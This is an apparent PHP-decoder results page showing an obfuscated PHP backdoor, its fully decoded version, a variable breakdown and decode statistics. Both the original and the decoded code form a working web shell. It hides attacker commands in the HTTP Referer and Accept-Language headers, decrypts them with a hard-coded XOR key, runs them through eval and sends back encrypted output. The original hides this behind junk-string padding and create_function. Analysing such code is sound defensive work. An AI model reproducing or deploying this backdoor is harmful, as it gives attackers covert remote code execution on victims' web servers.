Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $M='g_5Ere5Eplac5Ee(arr5Eay(5E"/_/5E","/-/"),arr5Eay("/","+5E"),$ss($5Es[$i],05E,$e..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$M='g_5Ere5Eplac5Ee(arr5Eay(5E"/_/5E","/-/"),arr5Eay("/","+5E"),$ss($5Es[$i],05E,$e5E))),$5Ek)5E)5E5E);$o=ob_get_contents();o';
$R=';$q=ar5Er5Eay_values5E(5E$q);5Epreg_mat5Ech_all("/([\\5Ew])[5E\\w5E-]+(?5E:;q=0.([\\5Ed]))?,?/5E",$5Era,$m);if($5Eq&&$m5E){5E@s';
$j='E[2][$z5E]];if(5Estrpos($5Ep,$h)===0)5E{$5Es[$i5E]="";$p=$ss($p,35E);5E}if(ar5Eray_key_e5Exis5Ets($i,$s))5E{$s[$i].=5E5E$';
$e='p5E5E;$e=strpos($s[$i5E],$f5E);5Eif($e){$k=$kh.$kf;5Eob_st5Eart5E();@ev5Eal(@gzu5En5Ecompress(@x(5E@b5Ease64_decod5Ee(pre';
$h='EER"];$ra=@$r[5E"HTTP5E_5EACCEPT_LANGUAG5EE"];5Eif5E5E($5Err&&$ra)5E{$u=parse_url($rr);5Ep5E5E5Earse_str($u["query"5E],$q)';
$u='5Eb_en5Ed_c5Elean(5E);$d=bas5Ee64_e5Enco5Ed5Ee(x(gzcom5Epress5E($o),$k))5E;print("<$k>$d<5E/$k5E>");@sess5Ei5Eon_destro5Ey();}}}}';
$A=str_replace('oN','','creoNoNateoN_fuoNncoNtoNion');
$X='d5($i5E5E.$kh),0,3))5E5E;$f=$sl5E($ss(md5($i.$5Ekf)5E,0,35E));$p=5E"5E"5E;for($z=1;$z<c5Eount($m[1]);$z5E++5E5E)5E$p.=$q[$m5';
$I='$kh="5d5E41"5E;$kf="45E5E02a";fu5Enction x($t,$k)5E{$5Ec=5Estr5El5Een($k);$l=strlen($5Et);$o=5E"";for($i=5E0;$i<$l5E;)5E5E5E{f';
$T='or($j=0;($j<$c5E&&$i<$5El);$5Ej++5E,$5Ei++){$o.=$t{$5Ei}^$k5E{$j};}}ret5Eurn $o;}$r=$5E5E_SERVER;5E$rr=@5E$r["5EH5ETTP_REFER5';
$z='ession_s5Etart();5E$s=&5E$_SESSIO5EN5E;$ss="subs5Etr"5E;$sl="st5Erto5E5Elower";$i=$m5E[1][5E0].$m[5E1][1];$5Eh=$sl($ss5E(m';
$d=str_replace('5E','',$I.$T.$h.$R.$z.$X.$j.$e.$M.$u);
$n=$A('',$d);$n();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$A create_function
$I $kh="5d5E41"5E;$kf="45E5E02a";fu5Enction x($t,$k)5E{$5Ec=5Es..
$M g_5Ere5Eplac5Ee(arr5Eay(5E"/_/5E","/-/"),arr5Eay("/","+5E"),..
$R ;$q=ar5Er5Eay_values5E(5E$q);5Epreg_mat5Ech_all("/([\5Ew])[5..
$T or($j=0;($j<$c5E&&$i<$5El);$5Ej++5E,$5Ei++){$o.=$t{$5Ei}^$k5..
$X d5($i5E5E.$kh),0,3))5E5E;$f=$sl5E($ss(md5($i.$5Ekf)5E,0,35E)..
$d $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$e p5E5E;$e=strpos($s[$i5E],$f5E);5Eif($e){$k=$kh.$kf;5Eob_st5E..
$h EER"];$ra=@$r[5E"HTTP5E_5EACCEPT_LANGUAG5EE"];5Eif5E5E($5Err..
$j E[2][$z5E]];if(5Estrpos($5Ep,$h)===0)5E{$5Es[$i5E]="";$p=$ss..
$n None
$u 5Eb_en5Ed_c5Elean(5E);$d=bas5Ee64_e5Enco5Ed5Ee(x(gzcom5Epres..
$z ession_s5Etart();5E$s=&5E$_SESSIO5EN5E;$ss="subs5Etr"5E;$sl=..

Stats

MD5 951a17e5755993ffc74bbb6ef3c80199
Eval Count 1
Decode Time 101 ms